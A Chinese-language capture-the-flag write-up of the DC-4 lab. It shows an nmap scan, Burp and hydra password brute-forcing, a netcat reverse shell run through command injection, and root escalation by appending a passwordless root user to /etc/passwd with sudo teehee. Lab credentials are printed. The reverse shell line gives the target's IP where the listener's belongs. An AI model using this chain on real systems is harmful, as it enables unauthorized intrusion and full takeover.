DC-4渗透测试
0x00实验环境
靶机:DC-4,IP地址:192.168.62.137
Kali:Kali,IP地址:192.168.62.135
1.首先做主机发现,确定ip地址为:192.168.62.137
2.使用nmap进行扫描主机
nmap -sS -Pn -A -p- -n 192.168.62.137
根据nmap扫描结果可知,该主机开放了22的ssh服务和80的http服务并且分别对应的服务版本号是openssh7.4p1和nginx 1.15.10
3.根据开放的服务进行web端访问:
.提示用admin登录,但是不知道密码,使用burp进行爆破,得到admin : happy
登录后台发现可以执行命令
尝试BP抓包修改命令 nc 192.168.62.137 6666(端口)(靶机ip)-e /bin/bash
使用nc命令进行反弹,反弹成功。.进入交互模式,便于操作
python -c ‘import pty;pty.spawn("/bin/sh")’
Get shell
切换到/home目录下,查看用户目录
下载bak文件,
用hydra进行爆破
hydra -L username.txt -P passwords.txt ssh://192.168.62.137
得到 jim : jibril04
用jim登录
进入/var/mail目录,查看邮件,发现charles用户的登录密码
得到Charles:^xHhA&hvim0y
登录charles并查看charles的sudo权限
使用sudo命令查看charles用户可以哪些具有root权限的命令,发现可以使用teehee命令
sudo -l
使用teehee命令将一个无密码用户admin写入到/etc/passwd文件,并加入到root组中
echo “admin::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
切换到admin用户登录,进入到/root目录下,找到flag.txt文件
su admin
id
cd /root
cat flag.txt
